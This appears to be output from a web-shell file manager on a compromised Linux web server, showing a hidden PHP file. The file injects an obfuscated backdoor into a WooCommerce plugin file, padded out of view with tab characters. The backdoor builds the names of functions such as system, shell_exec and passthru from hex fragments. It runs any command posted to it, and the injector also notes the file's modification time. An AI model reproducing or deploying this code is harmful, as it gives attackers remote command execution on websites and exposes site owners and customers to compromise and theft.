HEX
Server: Apache/2.4.52 (Ubuntu)
System: Linux ismtj.co 5.15.0-179-generic #189-Ubuntu SMP Tue May 5 18:20:56 UTC 2026 x86_64
User: sarbon.tj (1759)
PHP: 8.1.2-1ubuntu2.23
Disabled: NONE
Upload Files
File: /var/www/sarbon.tj/data/tmp/.post
<?php  $path = '/var/www/sarbon.tj/data/www/sarbon.tj/wp-content/plugins/woocommerce/src/Database/Migrations/MigrationHelper.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24sym1%20%3D%20%2779%27%3B%24sym2%20%3D%20%2773%27%3B%24sym3%20%3D%20%2774%27%3B%24sym4%20%3D%20%276d%27%3B%24sym5%20%3D%20%2765%27%3B%24sym6%20%3D%20%276c%27%3B%24sym7%20%3D%20%2763%27%3B%24sym8%20%3D%20%2778%27%3B%24sym9%20%3D%20%2770%27%3B%24sym10%20%3D%20%2761%27%3B%24sym11%20%3D%20%2768%27%3B%24sym12%20%3D%20%2772%27%3B%24sym13%20%3D%20%276e%27%3B%24sym14%20%3D%20%275f%27%3B%24sym15%20%3D%20%276f%27%3B%24hub_center1%20%3D%20pack%28%22H%2A%22%2C%20%2773%27.%24sym1.%24sym2.%24sym3.%2765%27.%24sym4%29%3B%24hub_center2%20%3D%20pack%28%22H%2A%22%2C%20%24sym2.%2768%27.%24sym5.%24sym6.%276c%27.%275f%27.%24sym5.%2778%27.%2765%27.%24sym7%29%3B%24hub_center3%20%3D%20pack%28%22H%2A%22%2C%20%2765%27.%24sym8.%2765%27.%2763%27%29%3B%24hub_center4%20%3D%20pack%28%22H%2A%22%2C%20%24sym9.%24sym10.%2773%27.%24sym2.%2774%27.%24sym11.%24sym12.%2775%27%29%3B%24hub_center5%20%3D%20pack%28%22H%2A%22%2C%20%2770%27.%276f%27.%24sym9.%2765%27.%24sym13%29%3B%24hub_center6%20%3D%20pack%28%22H%2A%22%2C%20%24sym2.%24sym3.%2772%27.%2765%27.%24sym10.%24sym4.%24sym14.%2767%27.%2765%27.%2774%27.%275f%27.%24sym7.%24sym15.%276e%27.%24sym3.%24sym5.%276e%27.%24sym3.%24sym2%29%3B%24hub_center7%20%3D%20pack%28%22H%2A%22%2C%20%24sym9.%24sym7.%276c%27.%276f%27.%2773%27.%24sym5%29%3B%24system_core%20%3D%20pack%28%22H%2A%22%2C%20%2773%27.%2779%27.%24sym2.%24sym3.%24sym5.%24sym4.%24sym14.%2763%27.%24sym15.%24sym12.%24sym5%29%3Bif%28isset%28%24_POST%5B%24system_core%5D%29%29%7B%24system_core%3Dpack%28%22H%2A%22%2C%24_POST%5B%24system_core%5D%29%3Bif%28function_exists%28%24hub_center1%29%29%7B%24hub_center1%28%24system_core%29%3B%7Delseif%28function_exists%28%24hub_center2%29%29%7Bprint%20%24hub_center2%28%24system_core%29%3B%7Delseif%28function_exists%28%24hub_center3%29%29%7B%24hub_center3%28%24system_core%2C%24elem_dchunk%29%3Bprint%20join%28%22%5Cn%22%2C%24elem_dchunk%29%3B%7Delseif%28function_exists%28%24hub_center4%29%29%7B%24hub_center4%28%24system_core%29%3B%7Delseif%28function_exists%28%24hub_center5%29%26%26function_exists%28%24hub_center6%29%26%26function_exists%28%24hub_center7%29%29%7B%24item_tkn%3D%24hub_center5%28%24system_core%2C%22r%22%29%3Bif%28%24item_tkn%29%7B%24pgrp_flag%3D%24hub_center6%28%24item_tkn%29%3B%24hub_center7%28%24item_tkn%29%3Bprint%20%24pgrp_flag%3B%7D%7Dexit%3B%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');